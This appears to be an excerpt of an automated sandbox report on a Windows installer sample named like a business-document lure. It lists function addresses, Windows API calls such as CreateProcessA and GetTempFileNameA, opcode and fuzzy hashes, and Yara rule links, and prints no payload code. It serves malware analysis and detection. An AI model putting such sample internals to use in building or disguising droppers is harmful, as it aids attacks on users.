                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1356686001-0
                                                                                                                                                                                                                          • Opcode ID: 1479a39ed53ebae2bf8867e30db793c1b729056d8581af6253ce6a52201b047e
                                                                                                                                                                                                                          • Instruction ID: 133b3897f1a97e650f74ae2c97eeacc267919fe8998a33790bec377d3be5ae35
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1479a39ed53ebae2bf8867e30db793c1b729056d8581af6253ce6a52201b047e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F61163B1E00108BFEB10AFA4DE89EAF7A79EB54358F10403AF505B61D1D6B85D419A28
                                                                                                                                                                                                                          Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DestroyWindow.USER32(?,00000000,00402DE2,?), ref: 00402C15
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C33
                                                                                                                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2102729457-0
                                                                                                                                                                                                                          • Opcode ID: bf3565a8d54977e971102c74698aaa5ab0c905542a3b89f7c95156eeb2b10c0e
                                                                                                                                                                                                                          • Instruction ID: 2730d2a3776e1339b9346d87ab19af6b7380862a528adabe40aaf425641bd1fc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf3565a8d54977e971102c74698aaa5ab0c905542a3b89f7c95156eeb2b10c0e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F054B090A270ABD621BF20FE4C99F7B74E7447117124476F004B21A4C67898C1CBAC
                                                                                                                                                                                                                          Function 00404E8A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00404EB9
                                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?), ref: 00404F0A
                                                                                                                                                                                                                            • Part of subcall function 00403F2E: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F40
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                          • Opcode ID: 44b8d16fffa3cf511a27652146f874074467920310ea138c5a7b32cc615b7cdd
                                                                                                                                                                                                                          • Instruction ID: 4911906597f3eaa4ffbe68f0188cda158002c4f31c253b535ba85266db60279e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44b8d16fffa3cf511a27652146f874074467920310ea138c5a7b32cc615b7cdd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC0175B110020DABDB205F52EC81AAB3625F7C4751F204037FB01756D1C7399C51AAB9
                                                                                                                                                                                                                          Function 0040599F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 004059B3
                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 004059CD
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountFileNameTempTick
                                                                                                                                                                                                                          • String ID: nsa
                                                                                                                                                                                                                          • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                          • Opcode ID: 95c6d3479798503f7923504534165061c55f320a4664c3ca80cf9d12d42afe18
                                                                                                                                                                                                                          • Instruction ID: 3f05255bf470524d05267fbe77a66a547c73f63e6c4f6eb4cae2c62e5f282410
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95c6d3479798503f7923504534165061c55f320a4664c3ca80cf9d12d42afe18
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3F0E272708204ABEB108F55EC04B9B7B9CDF91720F10803BFA08DA180D2B098108BA9
                                                                                                                                                                                                                          Function 0040548E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421528,Error launching installer), ref: 004054B7
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004054C4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Error launching installer, xrefs: 004054A1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                          • String ID: Error launching installer
                                                                                                                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                                                                                                                          • Opcode ID: 11830fbe1599591dde0320708e1ac997fc89973e1d072e2855f62d3e6df5e4ac
                                                                                                                                                                                                                          • Instruction ID: 371522acfb7cd9539d7ae69e543ca64f087bc7c9f75cc5940c594e3c03f6d28b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11830fbe1599591dde0320708e1ac997fc89973e1d072e2855f62d3e6df5e4ac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6E04FF1A102097FEB009BA0EC05F7B7BBCE754704F404471BD01F21A0D678A8408A79
                                                                                                                                                                                                                          Function 00406779 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6f303b90f097451caafc5c82d86dc7f8c3a5ca7b8ce6b4562ff9062d076474e9
                                                                                                                                                                                                                          • Instruction ID: cf83b5f92aa564cc298776c77b2bdd28f1825052710f2ecdbdb4cfcb1c159722
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f303b90f097451caafc5c82d86dc7f8c3a5ca7b8ce6b4562ff9062d076474e9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92A13171E00229CBDF28DFA8C8547ADBBB1FB44305F11816ED816BB281C7786A96CF44
                                                                                                                                                                                                                          Function 0040697A Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1ab636e1636351d1357f15bb4f6043d343d203a0e7e05c7e50cd2d20e4a1f53c
                                                                                                                                                                                                                          • Instruction ID: cdde4d58dff4e4a9c83cf0d0e57cddb7afde41a65112cf45587a3a44971c93cd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ab636e1636351d1357f15bb4f6043d343d203a0e7e05c7e50cd2d20e4a1f53c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A911070E04228CBDF28DF98C8547ADBBB1FB44305F15816ED816BB281C778AA96DF44
                                                                                                                                                                                                                          Function 00406690 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 73ca531164300be04a77f53002292f938c132f2b380a2f89a8108b3de7a2d466
                                                                                                                                                                                                                          • Instruction ID: 210b764e34932ffe60d6cfe39aea5744945828095a37428d8e8ad2b7e06fd55b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 73ca531164300be04a77f53002292f938c132f2b380a2f89a8108b3de7a2d466
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B814671E04228CFDF24CFA8C8847ADBBB1FB44305F25816AD416BB281C7789A96DF44
                                                                                                                                                                                                                          Function 00406195 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d2cfe53134c7a763aaa08aff8449c0b0f7d6a132f5d25363dfe6705ba01c87a0
                                                                                                                                                                                                                          • Instruction ID: d8cce1150c04716a98830c198e93b549954248a52dda193404c5f2b9195ff2ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2cfe53134c7a763aaa08aff8449c0b0f7d6a132f5d25363dfe6705ba01c87a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89815771E04228CBDF24CFA8C8447ADBBB1FB44315F1181AED856BB281D7786A96DF44
                                                                                                                                                                                                                          Function 004065E3 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 452643e19685fcea5462b53912e8b008e2854c88062b067f0f8fd89253b448af
                                                                                                                                                                                                                          • Instruction ID: 258a3fd06c35fad05ca81ab60d081a33c15d1deb970c592860f690c18264f2bd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 452643e19685fcea5462b53912e8b008e2854c88062b067f0f8fd89253b448af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D711271E04228CBDF24CFA8C8547ADBBF1FB44305F15806AD856BB281D7785A96DF44
                                                                                                                                                                                                                          Function 00406701 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 12a72383bc36c7d96190d5e65704f25bda740c5ae2a23a9d2252c3d1e3b898a5
                                                                                                                                                                                                                          • Instruction ID: babde66c8cd488a95ab0ad7164d611a89d90f571a219cc2b865e3b094ddf9d96
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12a72383bc36c7d96190d5e65704f25bda740c5ae2a23a9d2252c3d1e3b898a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28712471E04228CBDF28CFA8C8547ADBBB1FB44305F15816ED856BB281C7785A96DF44
                                                                                                                                                                                                                          Function 0040664D Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 61a2e03896eecfdf1d4da445d37de20e8426d4ebfe516142fa5c4c165488df89
                                                                                                                                                                                                                          • Instruction ID: 6cdc3ec63689871e8710e51dd90966e3aca29af0085505062bf66b2ee05b33a6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61a2e03896eecfdf1d4da445d37de20e8426d4ebfe516142fa5c4c165488df89
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25714571E04228CBDF28CF98C8547ADBBB1FB44305F11806ED856BB281C7786A96DF44
                                                                                                                                                                                                                          Function 001168A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: \;Zr$\;Zr$\;Zr$\;Zr
                                                                                                                                                                                                                          • API String ID: 0-4252169449
                                                                                                                                                                                                                          • Opcode ID: 233e95ba23dbe4e4fc042b75de76b92548099d0a2fb572c54fb5a60e4d919cdf
                                                                                                                                                                                                                          • Instruction ID: a79b53753bf96d12c9d68a3d4ac306d883f1aee82cc863711e9ce3a19adf9918
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 233e95ba23dbe4e4fc042b75de76b92548099d0a2fb572c54fb5a60e4d919cdf
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 600171317002249FC75CDE2CC560AEA77E6AF88B6872541BAE406CB3B4DF72DC819790
                                                                                                                                                                                                                          Function 004058D5 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E5
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004058FD
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040590E
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405B32,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                          • Opcode ID: 0fc7b795b21fde4e840a5a8ebe1bc240de770827404be4bbaaf079e1ba8cc010
                                                                                                                                                                                                                          • Instruction ID: 18e4c75142147f65de27112721ce36ab9a51ac25249ca18f40cf651f68c78b39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fc7b795b21fde4e840a5a8ebe1bc240de770827404be4bbaaf079e1ba8cc010
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F0F632505414FFCB029FA4DD00D9EBBA8DF05360B2540B5F800F7250D234EE01AB99